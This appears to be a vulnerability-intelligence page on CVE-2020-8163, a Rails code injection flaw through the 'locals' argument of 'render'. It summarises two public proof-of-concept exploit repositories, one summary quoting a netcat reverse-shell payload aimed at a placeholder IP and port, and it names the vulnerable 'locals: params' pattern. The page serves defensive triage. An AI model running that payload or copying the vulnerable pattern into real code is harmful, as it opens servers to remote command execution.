CVE-2020-8163 is a code injection vulnerability in Ruby on Rails versions prior to 5.0.1. The vulnerability arises when an attacker is able to control the 'locals' argument passed to the 'render' method, allowing them to inject and execute arbitrary code on the server. This flaw is due to improper control of code generation (CWE-94) in the handling of the 'locals' parameter.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
Repository provides an operational proof-of-concept exploit for CVE-2020-8163 (Rails RCE via user-controlled local variable names in `render ... locals:`) plus a bundled vulnerable Rails 4.2.11.1 test application. Key files: - `exploit.rb`: Standalone Ruby script using `Net::HTTP.get` to send a crafted GET request to a user-supplied URL. The query string injects Ruby code that calls `system('nc -e /bin/sh <ip> <port>')`, yielding a reverse shell to the attacker. - `README.md`: Describes affected versions (Rails < 5.0.1; notes fix in 4.2.11.2) and points to the vulnerable endpoint in the included app (`main/index`). - `metasploit.rb`: Empty placeholder; despite the name, this is not a Metasploit module. - `testapp/`: Full Rails application intentionally configured to be vulnerable. The vulnerability is demonstrated in `testapp/app/views/main/index.html.erb` with `render partial: 'partialtest', locals: params`, allowing attacker-controlled parameter names to become local variable names during template rendering. Routes in `testapp/config/routes.rb` expose `GET /main/index`. Overall purpose: demonstrate and exploit Rails template rendering code injection when untrusted input controls the keys of the `locals` hash, resulting in server-side command execution. The included app is for local testing/verification of the CVE.
This repository provides an operational exploit for CVE-2020-8163, a remote code execution vulnerability in Ruby on Rails versions prior to 5.0.1 and 4.2.11.2. The structure includes a full Rails test application (test_cve-2020-8163/) and a standalone exploit script (exploit.rb). The README details how to set up a vulnerable environment using Docker and how to run the exploit. The exploit.rb script sends a specially crafted HTTP GET request to a vulnerable Rails endpoint (e.g., /main/index), injecting a payload that results in arbitrary command execution on the server. The payload is customizable via command-line arguments. The repository is not part of a framework and is self-contained, providing both the vulnerable environment and the exploit. The main attack vector is network-based, targeting HTTP endpoints exposed by the Rails application. The exploit is operational, as it provides a working payload and setup instructions, but is not weaponized for mass exploitation.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
No public activity tracked yet. Mallory keeps watching.
No public activity observed for this vulnerability.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.